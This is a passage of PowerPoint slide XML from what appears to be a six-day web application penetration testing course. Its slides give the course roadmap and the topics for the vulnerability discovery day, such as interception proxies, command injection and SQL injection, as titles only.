        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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atin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1905000"/>
            <a:ext cx="8001000" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 1: Attacker's View, Pen-Testing and Scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 2: Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 3: Vulnerability Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 4: Vulnerability Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 5: Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Day 6: Capture the Flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Right Arrow 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3298208"/>
            <a:ext cx="762000" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
